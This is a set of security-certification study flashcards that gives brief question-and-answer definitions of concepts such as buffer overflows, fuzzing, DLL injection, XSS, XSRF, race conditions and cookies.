4.4 Security Architecture and Tool Sets Flashcards
what is the purpose of filters on a web server?
they limit the traffic that is allowed through
what is the purpose of sandbox in a java applet?
it prevents java applets from accessing unauthorized areas on a user’s computer
which error condition arises because data is not checked before input to ensure that it has an appropriate length?
buffer overflow errors
when does fuzzing occur?
when unexpected values are provided as input to an application to make the application crash
what are the FIVE phases of the system development life cycle (SDLC)?
- initiation
- development and acquisition
- implementation and assessment
- operations and maintenance
- disposal
what is the purpose of a decompiler?
to re-create the source code in some high-level language
which type of attack runs code within another process’s address space by making it load a dynamic link library?
a DLL injection attack
what is the purpose of fuzz testing?
to identify bugs and security flaws within an application
what are alternate terms for cross-site request forgery (XSRF)?
session riding or one-click attack
which application hardening method requires that your organization periodically checks with the application vendor?
patch management
what is the most significant misuse of cookies?
misuse of personal data
when does fuzzing occur?
when unexpected values are provided as input to an application in an effort to make the application crash
what does a race condition typically attack?
the delay between time of check (TOC) and time of use (TOU)
when does a cross-site scripting (XSS) attack occur?
it occurs when an attacker locates a vulnerability on a web site that allows the attacker to inject malicious code into a web application
what is the name for a small piece of information that is saved on a client machine on the hard disk to enable tracking of user information on future web visits?
a cookie
what is the purpose of an application disassembler?
to read and understand the raw language of the program
what is the purpose of a fail-safe error handler?
to ensure that the application stops working, reports the error, and closes down
what is an application backdoor?
lines of code that are inserted into an application to allow developers to enter the application and bypass the security mechanisms
what is cross-site request forgery (XSRF)?
unauthorized commands coming from a trusted user to a user or web site, usually through social networking
what should application developers do to prevent race condition attack?
create code that processes exclusive-lock resources in a certain sequence and unlocks them in reverse order
what is the best protection against cross-site scripting? (XSS)?
disable the running of scripts
what is the purpose of secure code review?
it examines all written code for any security holes that may exist
what is a cookie?
a web client test file that stores persistent settings for a web server
what is the purpose of input validation?
to ensure that data being entered into a database follows certain parameters